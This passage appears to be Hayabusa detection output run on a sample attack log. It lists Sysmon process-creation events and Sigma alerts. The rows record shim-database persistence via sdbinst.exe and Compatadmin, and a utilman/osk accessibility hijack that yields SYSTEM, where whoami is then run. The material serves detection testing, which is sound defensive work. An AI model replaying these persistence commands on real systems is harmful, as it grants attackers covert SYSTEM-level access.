AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 
+09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts 
